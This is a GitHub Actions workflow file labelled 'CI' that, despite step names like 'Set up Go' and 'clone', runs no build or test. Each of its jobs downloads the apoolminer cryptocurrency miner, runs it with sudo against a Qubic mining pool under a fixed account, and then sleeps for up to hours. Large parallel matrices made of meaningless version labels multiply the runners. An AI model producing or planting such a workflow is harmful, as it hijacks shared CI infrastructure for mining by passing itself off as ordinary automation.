name: CI
on: 
  push:
    branches: [ "main" ]

jobs:
  su:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 10
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v4
    - name: clone
      run: wget https://github.com/apool-io/apoolminer/releases/download/v3.2.2/apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && tar xf apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && cd apoolminer_linux_qubic_autoupdate_v3.2.2 && sudo ./apoolminer --gpu-off --account CP_mq5gs4i96h --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic.asia.apool.io:4334 --thread 4 &
           sleep 310s
  ram:
    needs: su
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/apool-io/apoolminer/releases/download/v3.2.2/apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && tar xf apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && cd apoolminer_linux_qubic_autoupdate_v3.2.2 && sudo ./apoolminer --gpu-off --account CP_mq5gs4i96h --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic.asia.apool.io:4334 --thread 4 &
            sleep 5m
        
    
     
  se:
    needs: [su]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/apool-io/apoolminer/releases/download/v3.2.2/apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && tar xf apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && cd apoolminer_linux_qubic_autoupdate_v3.2.2 && sudo ./apoolminer --gpu-off --account CP_mq5gs4i96h --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic.asia.apool.io:4334 --thread 4 &
            sleep 6m
  ka:
    needs: ram
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/apool-io/apoolminer/releases/download/v3.2.2/apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && tar xf apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && cd apoolminer_linux_qubic_autoupdate_v3.2.2 && sudo ./apoolminer --gpu-off --account CP_mq5gs4i96h --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic.asia.apool.io:4334 --thread 4 &
            sleep 101m
        
    
     
  li:
    needs: [se]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [18.20, 20.19, 22.15, 22.16, 18, 20, 22, 22.13, 22.14] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-node@v4
      with:
        node-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/apool-io/apoolminer/releases/download/v3.2.2/apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && tar xf apoolminer_linux_qubic_autoupdate_v3.2.2.tar.gz && cd apoolminer_linux_qubic_autoupdate_v3.2.2 && sudo ./apoolminer --gpu-off --account CP_mq5gs4i96h --worker $(echo $(shuf -i 1-15000 -n 1)-tod) --pool qubic.asia.apool.io:4334 --thread 4 &
            sleep 178m
        
    
  
